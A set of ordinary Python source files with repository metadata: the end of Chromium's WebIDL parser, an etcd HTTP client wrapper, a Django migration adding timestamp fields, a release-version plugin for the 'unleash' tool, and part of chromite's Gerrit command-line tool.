if type(p[1]) == str:
p[0] = self.BuildNamed('PrimitiveType', p, 1)
else:
p[0] = p[1]
# [80]
def p_UnrestrictedFloatType(self, p):
"""UnrestrictedFloatType : UNRESTRICTED FloatType
| FloatType"""
if len(p) == 2:
typeref = self.BuildNamed('PrimitiveType', p, 1)
else:
typeref = self.BuildNamed('PrimitiveType', p, 2)
typeref.AddChildren(self.BuildTrue('UNRESTRICTED'))
p[0] = typeref
# [81]
def p_FloatType(self, p):
"""FloatType : FLOAT
| DOUBLE"""
p[0] = p[1]
# [82]
def p_UnsignedIntegerType(self, p):
"""UnsignedIntegerType : UNSIGNED IntegerType
| IntegerType"""
if len(p) == 2:
p[0] = p[1]
else:
p[0] = 'unsigned ' + p[2]
# [83]
def p_IntegerType(self, p):
"""IntegerType : SHORT
| LONG OptionalLong"""
if len(p) == 2:
p[0] = p[1]
else:
p[0] = p[1] + p[2]
# [84]
def p_OptionalLong(self, p):
"""OptionalLong : LONG
| """
if len(p) > 1:
p[0] = ' ' + p[1]
else:
p[0] = ''
# [85] Add support for sized array
def p_TypeSuffix(self, p):
"""TypeSuffix : '[' integer ']' TypeSuffix
| '[' ']' TypeSuffix
| '?' TypeSuffixStartingWithArray
| """
if len(p) == 5:
p[0] = self.BuildNamed('Array', p, 2, p[4])
if len(p) == 4:
p[0] = self.BuildProduction('Array', p, 1, p[3])
if len(p) == 3:
p[0] = ListFromConcat(self.BuildTrue('NULLABLE'), p[2])
# [86]
def p_TypeSuffixStartingWithArray(self, p):
"""TypeSuffixStartingWithArray : '[' ']' TypeSuffix
| """
if len(p) > 1:
p[0] = self.BuildProduction('Array', p, 0, p[3])
# [87]
def p_Null(self, p):
"""Null : '?'
|"""
if len(p) > 1:
p[0] = self.BuildTrue('NULLABLE')
# [88]
def p_ReturnType(self, p):
"""ReturnType : Type
| VOID"""
if p[1] == 'void':
p[0] = self.BuildProduction('Type', p, 1)
p[0].AddChildren(self.BuildNamed('PrimitiveType', p, 1))
else:
p[0] = p[1]
# [89-90] NOT IMPLEMENTED (IdentifierList)
# [91]
def p_ExtendedAttributeNoArgs(self, p):
"""ExtendedAttributeNoArgs : identifier"""
p[0] = self.BuildNamed('ExtAttribute', p, 1)
# [92]
def p_ExtendedAttributeArgList(self, p):
"""ExtendedAttributeArgList : identifier '(' ArgumentList ')'"""
arguments = self.BuildProduction('Arguments', p, 2, p[3])
p[0] = self.BuildNamed('ExtAttribute', p, 1, arguments)
# [93]
def p_ExtendedAttributeIdent(self, p):
"""ExtendedAttributeIdent : identifier '=' identifier"""
value = self.BuildAttribute('VALUE', p[3])
p[0] = self.BuildNamed('ExtAttribute', p, 1, value)
# [94] NOT IMPLEMENTED (ExtendedAttributeIdentList)
# [95]
def p_ExtendedAttributeNamedArgList(self, p):
"""ExtendedAttributeNamedArgList : identifier '=' identifier '(' ArgumentList ')'"""
args = self.BuildProduction('Arguments', p, 4, p[5])
value = self.BuildNamed('Call', p, 3, args)
p[0] = self.BuildNamed('ExtAttribute', p, 1, value)
# [96] NOT IMPLEMENTED (ExtendedAttributeTypePair)
#
# Parser Errors
#
# p_error is called whenever the parser can not find a pattern match for
# a set of items from the current state. The p_error function defined here
# is triggered logging an error, and parsing recovery happens as the
# p_<type>_error functions defined above are called. This allows the parser
# to continue so as to capture more than one error per file.
#
def p_error(self, t):
if t:
lineno = t.lineno
pos = t.lexpos
prev = self.yaccobj.symstack[-1]
if type(prev) == lex.LexToken:
msg = "Unexpected %s after %s." % (
TokenTypeName(t), TokenTypeName(prev))
else:
msg = "Unexpected %s." % (t.value)
else:
last = self.LastToken()
lineno = last.lineno
pos = last.lexpos
msg = "Unexpected end of file after %s." % TokenTypeName(last)
self.yaccobj.restart()
# Attempt to remap the error to a friendlier form
if msg in ERROR_REMAP:
msg = ERROR_REMAP[msg]
self._last_error_msg = msg
self._last_error_lineno = lineno
self._last_error_pos = pos
def Warn(self, node, msg):
sys.stdout.write(node.GetLogLine(msg))
self.parse_warnings += 1
def LastToken(self):
return self.lexer.last
def __init__(self, lexer, verbose=False, debug=False, mute_error=False):
self.lexer = lexer
self.tokens = lexer.KnownTokens()
self.yaccobj = yacc.yacc(module=self, tabmodule=None, debug=debug,
optimize=0, write_tables=0)
self.parse_debug = debug
self.verbose = verbose
self.mute_error = mute_error
self._parse_errors = 0
self._parse_warnings = 0
self._last_error_msg = None
self._last_error_lineno = 0
self._last_error_pos = 0
#
# BuildProduction
#
# Production is the set of items sent to a grammar rule resulting in a new
# item being returned.
#
# p - Is the Yacc production object containing the stack of items
# index - Index into the production of the name for the item being produced.
# cls - The type of item being producted
# childlist - The children of the new item
def BuildProduction(self, cls, p, index, childlist=None):
try:
if not childlist:
childlist = []
filename = self.lexer.Lexer().filename
lineno = p.lineno(index)
pos = p.lexpos(index)
out = IDLNode(cls, filename, lineno, pos, childlist)
return out
except:
print 'Exception while parsing:'
for num, item in enumerate(p):
print ' [%d] %s' % (num, ExpandProduction(item))
if self.LastToken():
print 'Last token: %s' % str(self.LastToken())
raise
def BuildNamed(self, cls, p, index, childlist=None):
childlist = ListFromConcat(childlist)
childlist.append(self.BuildAttribute('NAME', p[index]))
return self.BuildProduction(cls, p, index, childlist)
def BuildComment(self, cls, p, index):
name = p[index]
# Remove comment markers
lines = []
if name[:2] == '//':
# For C++ style, remove any leading whitespace and the '//' marker from
# each line.
form = 'cc'
for line in name.split('\n'):
start = line.find('//')
lines.append(line[start+2:])
else:
# For C style, remove ending '*/''
form = 'c'
for line in name[:-2].split('\n'):
# Remove characters until start marker for this line '*' if found
# otherwise it should be blank.
offs = line.find('*')
if offs >= 0:
line = line[offs + 1:].rstrip()
else:
line = ''
lines.append(line)
name = '\n'.join(lines)
childlist = [self.BuildAttribute('NAME', name),
self.BuildAttribute('FORM', form)]
return self.BuildProduction(cls, p, index, childlist)
#
# BuildError
#
# Build and Errror node as part of the recovery process.
#
#
def BuildError(self, p, prod):
self._parse_errors += 1
name = self.BuildAttribute('NAME', self._last_error_msg)
line = self.BuildAttribute('LINE', self._last_error_lineno)
pos = self.BuildAttribute('POS', self._last_error_pos)
prod = self.BuildAttribute('PROD', prod)
node = self.BuildProduction('Error', p, 1,
ListFromConcat(name, line, pos, prod))
if not self.mute_error:
node.Error(self._last_error_msg)
return node
#
# BuildAttribute
#
# An ExtendedAttribute is a special production that results in a property
# which is applied to the adjacent item. Attributes have no children and
# instead represent key/value pairs.
#
def BuildAttribute(self, key, val):
return IDLAttribute(key, val)
def BuildFalse(self, key):
return IDLAttribute(key, Boolean(False))
def BuildTrue(self, key):
return IDLAttribute(key, Boolean(True))
def GetErrors(self):
# Access lexer errors, despite being private
# pylint: disable=W0212
return self._parse_errors + self.lexer._lex_errors
#
# ParseData
#
# Attempts to parse the current data loaded in the lexer.
#
def ParseText(self, filename, data):
self._parse_errors = 0
self._parse_warnings = 0
self._last_error_msg = None
self._last_error_lineno = 0
self._last_error_pos = 0
try:
self.lexer.Tokenize(data, filename)
nodes = self.yaccobj.parse(lexer=self.lexer) or []
name = self.BuildAttribute('NAME', filename)
return IDLNode('File', filename, 0, 0, nodes + [name])
except lex.LexError as lexError:
sys.stderr.write('Error in token: %s\n' % str(lexError))
return None
def ParseFile(parser, filename):
"""Parse a file and return a File type of node."""
with open(filename) as fileobject:
try:
out = parser.ParseText(filename, fileobject.read())
out.SetProperty('DATETIME', time.ctime(os.path.getmtime(filename)))
out.SetProperty('ERRORS', parser.GetErrors())
return out
except Exception as e:
last = parser.LastToken()
sys.stderr.write('%s(%d) : Internal parsing error\n\t%s.\n' % (
filename, last.lineno, str(e)))
def main(argv):
nodes = []
parser = IDLParser(IDLLexer())
errors = 0
for filename in argv:
filenode = ParseFile(parser, filename)
if (filenode):
errors += filenode.GetProperty('ERRORS')
nodes.append(filenode)
ast = IDLNode('AST', '__AST__', 0, 0, nodes)
print '\n'.join(ast.Tree(accept_props=['PROD']))
if errors:
print '\nFound %d errors.\n' % errors
return errors
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
{
"content_hash": "abcfd2f4995adfbee59e46ee01a10b32",
"timestamp": "",
"source": "github",
"line_count": 1085,
"max_line_length": 88,
"avg_line_length": 29.62027649769585,
"alnum_prop": 0.5785051963407803,
"repo_name": "CyanogenMod/android_external_chromium_org",
"id": "fabe2daa0008874928d3ddec526cc842f23acf37",
"size": "32327",
"binary": false,
"copies": "8",
"ref": "refs/heads/cm-12.0",
"path": "tools/idl_parser/idl_parser.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "AppleScript",
"bytes": "6973"
},
{
"name": "Assembly",
"bytes": "24741"
},
{
"name": "Batchfile",
"bytes": "7204"
},
{
"name": "C",
"bytes": "3593661"
},
{
"name": "C++",
"bytes": "200786844"
},
{
"name": "CSS",
"bytes": "847454"
},
{
"name": "HTML",
"bytes": "17248776"
},
{
"name": "Java",
"bytes": "5192594"
},
{
"name": "JavaScript",
"bytes": "10985195"
},
{
"name": "Makefile",
"bytes": "20865646"
},
{
"name": "Objective-C",
"bytes": "1135377"
},
{
"name": "Objective-C++",
"bytes": "7082902"
},
{
"name": "PHP",
"bytes": "61320"
},
{
"name": "PLpgSQL",
"bytes": "141320"
},
{
"name": "Perl",
"bytes": "69392"
},
{
"name": "Protocol Buffer",
"bytes": "360984"
},
{
"name": "Python",
"bytes": "6377861"
},
{
"name": "Rebol",
"bytes": "262"
},
{
"name": "Shell",
"bytes": "467517"
},
{
"name": "Standard ML",
"bytes": "1589"
},
{
"name": "XSLT",
"bytes": "418"
},
{
"name": "nesC",
"bytes": "15206"
}
],
"symlink_target": ""
}
|
import requests
import simplejson as json
from requests.auth import HTTPBasicAuth
from configs import etcd_config
class Etcd(object):
def __init__(self, room):
user = etcd_config.get(room).get('username')
password = etcd_config.get(room).get('username')
endpoint = etcd_config.get(room).get('endpoint')
if user and password:
auth = HTTPBasicAuth(user, password)
else:
auth = None
self.endpoint = endpoint
self.auth = auth
def set(self, key, value, ttl=None):
uri = '%s/v2/keys/%s' % (self.endpoint, key)
data = {'value': value}
if ttl is not None:
data['ttl'] = ttl
res = requests.put(uri, data=data, auth=self.auth)
res.raise_for_status()
return json.loads(res.text)
def append(self, key, value, ttl=None):
uri = '%s/v2/keys/%s' % (self.endpoint, key)
data = {'value': value}
if ttl is not None:
data['ttl'] = ttl
res = requests.post(uri, data=data, auth=self.auth)
res.raise_for_status()
return json.loads(res.text)
def mkdir(self, key, ttl=None):
uri = '%s/v2/keys/%s' % (self.endpoint, key)
data = {'dir': True}
if ttl is not None:
data['ttl'] = ttl
res = requests.put(uri, data=data, auth=self.auth)
res.raise_for_status()
return json.loads(res.text)
def rmdir(self, key, recursive=False):
uri = '%s/v2/keys/%s?dir=true&recursive=%s' % (
self.endpoint,
key,
'true' if recursive else 'false', )
res = requests.delete(uri, auth=self.auth)
res.raise_for_status()
return json.loads(res.text)
def get(self, key, recursive=False):
uri = '%s/v2/keys/%s?recursive=%s' % (
self.endpoint,
key,
'true' if recursive else 'false', )
res = requests.get(uri, auth=self.auth)
res.raise_for_status()
return json.loads(res.text)
def wait(self, key, recursive=False):
uri = '%s/v2/keys/%s?wait=true&recursive=%s' % (
self.endpoint,
key,
'true' if recursive else 'false', )
res = requests.get(uri, auth=self.auth)
res.raise_for_status()
return json.loads(res.text)
def get_all(self, key):
uri = '%s/v2/keys/%s' % (self.endpoint, key)
res = requests.get(uri, auth=self.auth)
res.raise_for_status()
data = json.loads(res.text)
return data['node'].get('nodes', [])
def delete(self, key):
uri = '%s/v2/keys/%s' % (self.endpoint, key)
res = requests.delete(uri, auth=self.auth)
res.raise_for_status()
return json.loads(res.text)
|
{
"content_hash": "26bc9127d5a07dae0aa2d092560b5881",
"timestamp": "",
"source": "github",
"line_count": 90,
"max_line_length": 59,
"avg_line_length": 31.07777777777778,
"alnum_prop": 0.5520200214515553,
"repo_name": "xiaomatech/ops",
"id": "506febed0a723a56d0c3c2db318b6fa8e8d27cc1",
"size": "2842",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "library/etcd.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1104608"
},
{
"name": "Shell",
"bytes": "11290"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('runs', '0002_auto_20170608_1312'),
]
operations = [
migrations.AlterModelOptions(
name='contentchannel',
options={'get_latest_by': 'created_at'},
),
migrations.AlterModelOptions(
name='contentchannelrun',
options={'get_latest_by': 'created_at'},
),
migrations.AddField(
model_name='contentchannel',
name='created_at',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AddField(
model_name='contentchannel',
name='modified_at',
field=models.DateTimeField(auto_now=True),
),
migrations.AddField(
model_name='contentchannelrun',
name='created_at',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AddField(
model_name='contentchannelrun',
name='modified_at',
field=models.DateTimeField(auto_now=True),
),
]
|
{
"content_hash": "6767beb3f3474421b83f04f552f2e3c5",
"timestamp": "",
"source": "github",
"line_count": 44,
"max_line_length": 93,
"avg_line_length": 30.772727272727273,
"alnum_prop": 0.5790251107828656,
"repo_name": "ivanistheone/waiter",
"id": "bd3e29c1bb651ef1136e1798fb44eb655e9f3755",
"size": "1427",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "runs/migrations/0003_auto_20170612_1829.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "9031"
},
{
"name": "HTML",
"bytes": "33583"
},
{
"name": "JavaScript",
"bytes": "9165"
},
{
"name": "Nginx",
"bytes": "998"
},
{
"name": "Python",
"bytes": "109970"
},
{
"name": "Shell",
"bytes": "8039"
}
],
"symlink_target": ""
}
|
from click import Option
from versio.version import Version
from unleash import log, opts, issues, commit, info
from .utils_assign import find_assign, replace_assign
from .utils_tree import require_file
PLUGIN_NAME = 'versions'
def require_setup_py():
return require_file(
'setup.py', 'No setup.py found',
'The version could not determined because no setup.py file was found. '
'Either supply a release version explicity or make sure setup.py '
'exists in the root of the repository.')
def setup(cli):
cli.commands['release'].params.append(Option(
['--dev-version', '-d'],
help='Set new development version to this. If not given, '
'auto-increment the release-version.'))
cli.commands['release'].params.append(Option(
['--release-version', '-v'],
help='Set the release version to this. If not given, will be '
'auto-detected from setup.py.'))
cli.params.append(Option(
['--package-dir', '-p'],
multiple=True,
help='Directories in which packages can be found (used to update '
'__version__ variables. Can be given multiple times.'))
def _shorten_version(version):
v = Version(str(version))
v.parts = [v.parts[0]] + [None] * 4
return v
def _set_commit_version(version):
# Steps
# 1. Replace commit message
# 2. Replace version in setup.py
# 3. Replace version in PKGNAME/__init__.py
setup_py = require_setup_py()
log.info('Updating setup.py and package version ({})'.format(version))
# update setup.py
commit.set_path_data('setup.py', replace_assign(setup_py,
'version',
version, ))
# update PKGNAME/__init__.py files
for fn in info['init_files']:
# replace version info
commit.set_path_data(fn, replace_assign(
commit.get_path_data(fn),
'__version__',
version, ))
def collect_info():
release_version = opts.get('release_version')
dev_version = opts.get('dev_version')
setup_py = require_setup_py()
try:
if release_version is None:
# try extracting version info
try:
release_version = find_assign(setup_py, 'version')
except ValueError as e:
issues.error(
e, 'There was an issue extracting the version number from '
'setup.py. Please make sure there is only a single '
'version= assignment in that file.')
log.debug('Release version automatically determined from setup.py')
else:
log.debug('Release version given on commandline.')
# parse release version string
release_version = _shorten_version(release_version)
if dev_version is None:
# if we're given no dev version, we try to create one by
# incrementing the release version
dev_version = Version(str(release_version))
dev_version.bump('release')
dev_version.bump('dev')
else:
# parse dev version string
dev_version = Version(dev_version)
except TypeError as e:
issues.error(
'Bad version number: {}'.format(e),
'The version number "{}" is not a version number that can be '
'understood by distutils.\n\n'
'Please correct the different version number and try again.'
.format(e))
# get package name
try:
pkg_name = find_assign(setup_py, 'name')
except ValueError as e:
issues.error(
e,
'Could not extract package name from setup.py. Please make sure '
'there is only a single name= expression in that file.')
info['pkg_name'] = pkg_name
info['release_version'] = str(release_version)
info['dev_version'] = str(dev_version)
# create the short versions
info['release_version_short'] = str(_shorten_version(release_version))
info['dev_version_short'] = str(_shorten_version(dev_version))
# use provided package dirs or auto-detected one from setup.py
pkg_paths = set(opts['package_dir'])
if not pkg_paths:
pkg_paths = set([info['pkg_name'], info['pkg_name'].replace('-', '_')])
log.debug('Package paths: {}'.format(pkg_paths))
init_files = [path + '/__init__.py' for path in pkg_paths]
init_files = filter(commit.path_exists, init_files)
if not init_files:
issues.warn(
'No __init__.py files found for packages.',
'While looking for package __init__.py files to update version '
'information in, none were found. This most often happens if your '
'package contains only modules or is not named after its primary '
'Python package.')
info['init_files'] = init_files
def prepare_release():
# update commit message
commit.message = u'Release version {}'.format(info['release_version'])
_set_commit_version(info['release_version'])
def prepare_dev():
commit.message = (u'Start developing version {} (after release of {})'
.format(info['dev_version'], info['release_version']))
_set_commit_version(info['dev_version'])
|
{
"content_hash": "034a44cc085916c7b65d82f570d11244",
"timestamp": "",
"source": "github",
"line_count": 157,
"max_line_length": 79,
"avg_line_length": 34.05095541401274,
"alnum_prop": 0.5974560419004863,
"repo_name": "mbr/unleash",
"id": "b41714bede5bf27ebc69d812cae46ba8d88d4c35",
"size": "5346",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "unleash/plugins/versions.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "73221"
}
],
"symlink_target": ""
}
|
"""A command line interface to Gerrit-on-borg instances.
Internal Note:
To expose a function directly to the command line interface, name your function
with the prefix "UserAct".
"""
from __future__ import print_function
import collections
import functools
import inspect
import json
import re
import sys
from chromite.lib import config_lib
from chromite.lib import constants
from chromite.lib import commandline
from chromite.lib import cros_build_lib
from chromite.lib import cros_logging as logging
from chromite.lib import gerrit
from chromite.lib import gob_util
from chromite.lib import parallel
from chromite.lib import terminal
from chromite.lib import uri_lib
from chromite.utils import memoize
assert sys.version_info >= (3, 6), 'This module requires Python 3.6+'
class UserAction(object):
"""Base class for all custom user actions."""
# The name of the command the user types in.
COMMAND = None
@staticmethod
def init_subparser(parser):
"""Add arguments to this action's subparser."""
@staticmethod
def __call__(opts):
"""Implement the action."""
raise RuntimeError('Internal error: action missing __call__ implementation')
# How many connections we'll use in parallel. We don't want this to be too high
# so we don't go over our per-user quota. Pick 10 somewhat arbitrarily as that
# seems to be good enough for users.
CONNECTION_LIMIT = 10
COLOR = None
# Map the internal names to the ones we normally show on the web ui.
GERRIT_APPROVAL_MAP = {
'COMR': ['CQ', 'Commit Queue ',],
'CRVW': ['CR', 'Code Review ',],
'SUBM': ['S ', 'Submitted ',],
'VRIF': ['V ', 'Verified ',],
'LCQ': ['L ', 'Legacy ',],
}
# Order is important -- matches the web ui. This also controls the short
# entries that we summarize in non-verbose mode.
GERRIT_SUMMARY_CATS = ('CR', 'CQ', 'V',)
# Shorter strings for CL status messages.
GERRIT_SUMMARY_MAP = {
'ABANDONED': 'ABD',
'MERGED': 'MRG',
'NEW': 'NEW',
'WIP': 'WIP',
}
def red(s):
return COLOR.Color(terminal.Color.RED, s)
def green(s):
return COLOR.Color(terminal.Color.GREEN, s)
def blue(s):
return COLOR.Color(terminal.Color.BLUE, s)
def _run_parallel_tasks(task, *args):
"""Small wrapper around BackgroundTaskRunner to enforce job count."""
with parallel.BackgroundTaskRunner(task, processes=CONNECTION_LIMIT) as q:
for arg in args:
q.put([arg])
def limits(cls):
"""Given a dict of fields, calculate the longest string lengths
This allows you to easily format the output of many results so that the
various cols all line up correctly.
"""
lims = {}
for cl in cls:
for k in cl.keys():
# Use %s rather than str() to avoid codec issues.
# We also do this so we can format integers.
lims[k] = max(lims.get(k, 0), len('%s' % cl[k]))
return lims
# TODO: This func really needs to be merged into the core gerrit logic.
def GetGerrit(opts, cl=None):
"""Auto pick the right gerrit instance based on the |cl|
Args:
opts: The general options object.
cl: A CL taking one of the forms: 1234 *1234 chromium:1234
Returns:
A tuple of a gerrit object and a sanitized CL #.
"""
gob = opts.gob
if cl is not None:
if cl.startswith('*') or cl.startswith('chrome-internal:'):
gob = config_lib.GetSiteParams().INTERNAL_GOB_INSTANCE
if cl.startswith('*'):
cl = cl[1:]
else:
cl = cl[16:]
elif ':' in cl:
gob, cl = cl.split(':', 1)
if not gob in opts.gerrit:
opts.gerrit[gob] = gerrit.GetGerritHelper(gob=gob, print_cmd=opts.debug)
return (opts.gerrit[gob], cl)
def GetApprovalSummary(_opts, cls):
"""Return a dict of the most important approvals"""
approvs = dict([(x, '') for x in GERRIT_SUMMARY_CATS])
for approver in cls.get('currentPatchSet', {}).get('approvals', []):
cats = GERRIT_APPROVAL_MAP.get(approver['type'])
if not cats:
logging.warning('unknown gerrit approval type: %s', approver['type'])
continue
cat = cats[0].strip()
val = int(approver['value'])
if not cat in approvs:
# Ignore the extended categories in the summary view.
continue
elif approvs[cat] == '':
approvs[cat] = val
elif val < 0:
approvs[cat] = min(approvs[cat], val)
else:
approvs[cat] = max(approvs[cat], val)
return approvs
def PrettyPrintCl(opts, cl, lims=None, show_approvals=True):
"""Pretty print a single result"""
if lims is None:
lims = {'url': 0, 'project': 0}
status = ''
if opts.verbose:
status += '%s ' % (cl['status'],)
else:
status += '%s ' % (GERRIT_SUMMARY_MAP.get(cl['status'], cl['status']),)
if show_approvals and not opts.verbose:
approvs = GetApprovalSummary(opts, cl)
for cat in GERRIT_SUMMARY_CATS:
if approvs[cat] in ('', 0):
functor = lambda x: x
elif approvs[cat] < 0:
functor = red
else:
functor = green
status += functor('%s:%2s ' % (cat, approvs[cat]))
print('%s %s%-*s %s' % (blue('%-*s' % (lims['url'], cl['url'])), status,
lims['project'], cl['project'], cl['subject']))
if show_approvals and opts.verbose:
for approver in cl['currentPatchSet'].get('approvals', []):
functor = red if int(approver['value']) < 0 else green
n = functor('%2s' % approver['value'])
t = GERRIT_APPROVAL_MAP.get(approver['type'], [approver['type'],
approver['type']])[1]
print(' %s %s %s' % (n, t, approver['by']['email']))
def PrintCls(opts, cls, lims=None, show_approvals=True):
"""Print all results based on the requested format."""
if opts.raw:
site_params = config_lib.GetSiteParams()
pfx = ''
# Special case internal Chrome GoB as that is what most devs use.
# They can always redirect the list elsewhere via the -g option.
if opts.gob == site_params.INTERNAL_GOB_INSTANCE:
pfx = site_params.INTERNAL_CHANGE_PREFIX
for cl in cls:
print('%s%s' % (pfx, cl['number']))
elif opts.json:
json.dump(cls, sys.stdout)
else:
if lims is None:
lims = limits(cls)
for cl in cls:
PrettyPrintCl(opts, cl, lims=lims, show_approvals=show_approvals)
def _Query(opts, query, raw=True, helper=None):
"""Queries Gerrit with a query string built from the commandline options"""
if opts.branch is not None:
query += ' branch:%s' % opts.branch
if opts.project is not None:
query += ' project: %s' % opts.project
if opts.topic is not None:
query += ' topic: %s' % opts.topic
if helper is None:
helper, _ = GetGerrit(opts)
return helper.Query(query, raw=raw, bypass_cache=False)
def FilteredQuery(opts, query, helper=None):
"""Query gerrit and filter/clean up the results"""
ret = []
logging.debug('Running query: %s', query)
for cl in _Query(opts, query, raw=True, helper=helper):
# Gerrit likes to return a stats record too.
if not 'project' in cl:
continue
# Strip off common leading names since the result is still
# unique over the whole tree.
if not opts.verbose:
for pfx in ('aosp', 'chromeos', 'chromiumos', 'external', 'overlays',
'platform', 'third_party'):
if cl['project'].startswith('%s/' % pfx):
cl['project'] = cl['project'][len(pfx) + 1:]
cl['url'] = uri_lib.ShortenUri(cl['url'])
ret.append(cl)
if opts.sort == 'unsorted':
return ret
if opts.sort == 'number':
key = lambda x: int(x[opts.sort])
else:
key = lambda x: x[opts.sort]
return sorted(ret, key=key)
class _ActionSearchQuery(UserAction):
"""Base class for actions that perform searches."""
@staticmethod
def init_subparser(parser):
"""Add arguments to this action's subparser."""
parser.add_argument('--sort', default='number',
help='Key to sort on (number, project); use "unsorted" '
'to disable')
parser.add_argument('-b', '--branch',
help='Limit output to the specific branch')
parser.add_argument('-p', '--project',
help='Limit output to the specific project')
parser.add_argument('-t', '--topic',
help='Limit output to the specific topic')
class ActionTodo(_ActionSearchQuery):
"""List CLs needing your review"""
COMMAND = 'todo'
@staticmethod
def __call__(opts):
"""Implement the action."""
cls = FilteredQuery(opts, ('reviewer:self status:open NOT owner:self '
'label:Code-Review=0,user=self '
'NOT label:Verified<0'))
PrintCls(opts, cls)
class ActionSearch(_ActionSearchQuery):
"""List CLs matching the search query"""
COMMAND = 'search'
@staticmethod
def init_subparser(parser):
"""Add arguments to this action's subparser."""
_ActionSearchQuery.init_subparser(parser)
parser.add_argument('query',
help='The search query')
@staticmethod
def __call__(opts):
"""Implement the action."""
cls = FilteredQuery(opts, opts.query)
PrintCls(opts, cls)
class ActionMine(_ActionSearchQuery):
"""List your CLs with review statuses"""
COMMAND = 'mine'
@staticmethod
def init_subparser(parser):
"""Add arguments to this action's subparser."""
_ActionSearchQuery.init_subparser(parser)
parser.add_argument('--draft', default=False, action='store_true',
help='Show draft changes')
@staticmethod
def __call__(opts):
"""Implement the action."""
if opts.draft:
rule = 'is:draft'
else:
rule = 'status:new'
cls = FilteredQuery(opts, 'owner:self %s' % (rule,))
PrintCls(opts, cls)
def _BreadthFirstSearch(to_visit, children, visited_key=lambda x: x):
"""Runs breadth first search starting from the nodes in |to_visit|
Args:
to_visit: the starting nodes
children: a function which takes a node and returns the nodes adjacent to it
visited_key: a function for deduplicating node visits. Defaults to the
identity function (lambda x: x)
Returns:
A list of nodes which are reachable from any node in |to_visit| by calling
|children| any number of times.
"""
to_visit = list(to_visit)
seen = set(visited_key(x) for x in to_visit)
for node in to_visit:
for child in children(node):
key = visited_key(child)
if key not in seen:
seen.add(key)
to_visit.append(child)
return to_visit
class ActionDeps(_ActionSearchQuery):
"""List CLs matching a query, and all transitive dependencies of those CLs"""
COMMAND = 'deps'
@staticmethod
def init_subparser(parser):
"""Add arguments to this action's subparser."""
_ActionSearchQuery.init_subparser(parser)
parser.add_argument('query',
help='The search query')
def __call__(self, opts):
"""Implement the action."""
cls = _Query(opts, opts.query, raw=False)
@memoize.Memoize
def _QueryChange(cl, helper=None):
return _Query(opts, cl, raw=False, helper=helper)
transitives = _BreadthFirstSearch(
cls, functools.partial(self._Children, opts, _QueryChange),
visited_key=lambda cl: cl.gerrit_number)
transitives_raw = [cl.patch_dict for cl in transitives]
PrintCls(opts, transitives_raw)
@staticmethod
def _ProcessDeps(opts, querier, cl, deps, required):
"""Yields matching dependencies for a patch"""
# We need to query the change to guarantee that we have a .gerrit_number
for dep in deps:
if not dep.remote in opts.gerrit:
opts.gerrit[dep.remote] = gerrit.GetGerritHelper(
remote=dep.remote, print_cmd=opts.debug)
helper = opts.gerrit[dep.remote]
# TODO(phobbs) this should maybe catch network errors.
changes = querier(dep.ToGerritQueryText(), helper=helper)
# Handle empty results. If we found a commit that was pushed directly
# (e.g. a bot commit), then gerrit won't know about it.
if not changes:
if required:
logging.error('CL %s depends on %s which cannot be found',
cl, dep.ToGerritQueryText())
continue
# Our query might have matched more than one result. This can come up
# when CQ-DEPEND uses a Gerrit Change-Id, but that Change-Id shows up
# across multiple repos/branches. We blindly check all of them in the
# hopes that all open ones are what the user wants, but then again the
# CQ-DEPEND syntax itself is unable to differeniate. *shrug*
if len(changes) > 1:
logging.warning('CL %s has an ambiguous CQ dependency %s',
cl, dep.ToGerritQueryText())
for change in changes:
if change.status == 'NEW':
yield change
@classmethod
def _Children(cls, opts, querier, cl):
"""Yields the Gerrit and CQ-Depends dependencies of a patch"""
for change in cls._ProcessDeps(
opts, querier, cl, cl.PaladinDependencies(None), True):
yield change
for change in cls._ProcessDeps(
opts, querier, cl, cl.GerritDependencies(), False):
yield change
class ActionInspect(_ActionSearchQuery):
"""Show the details of one or more CLs"""
COMMAND = 'inspect'
@staticmethod
def init_subparser(parser):
"""Add arguments to this action's subparser."""
_ActionSearchQuery.init_subparser(parser)
parser.add_argument('cls', nargs='+', metavar='CL',
help='The CL(s) to update')
@staticmethod
def __call__(opts):
"""Implement the action."""
cls = []
for arg in opts.cls:
helper, cl = GetGerrit(opts, arg)
change = FilteredQuery(opts, 'change:%s' % cl, helper=helper)
if change:
cls.extend(change)
else:
logging.warning('no results found for CL %s', arg)
PrintCls(opts, cls)
class _ActionLabeler(UserAction):
"""Base helper for setting labels."""
LABEL = None
VALUES = None
@classmethod
def init_subparser(cls, parser):
"""Add arguments to this action's subparser."""
parser.add_argument('--ne', '--no-emails', dest='notify',
default='ALL', action='store_const', const='NONE',
help='Do not send e-mail notifications')
parser.add_argument('-m', '--msg', '--message', metavar='MESSAGE',
help='Optional message to include')
parser.add_argument('cls', nargs='+', metavar='CL',
help='The CL(s) to update')
parser.add_argument('value', nargs=1, metavar='value', choices=cls.VALUES,
help='The label value; one of [%(choices)s]')
@classmethod
def __call__(cls, opts):
"""Implement the action."""
# Convert user friendly command line option into a gerrit parameter.
def task(arg):
helper, cl = GetGerrit(opts, arg)
helper.SetReview(cl, labels={cls.LABEL: opts.value[0]}, msg=opts.msg,
dryrun=opts.dryrun, notify=opts.notify)
_run_parallel_tasks(task, *opts.cls)
class ActionLabelAutoSubmit(_ActionLabeler):
"""Change the Auto-Submit label"""
COMMAND = 'label-as'
LABEL = 'Auto-Submit'
VALUES = ('0', '1')
class ActionLabelCodeReview(_ActionLabeler):
"""Change the Code-Review label (1=LGTM 2=LGTM+Approved)"""
COMMAND = 'label-cr'
LABEL = 'Code-Review'
VALUES = ('-2', '-1', '0', '1', '2')
class ActionLabelVerified(_ActionLabeler):
"""Change the Verified label"""
COMMAND = 'label-v'
LABEL = 'Verified'
VALUES = ('-1', '0', '1')
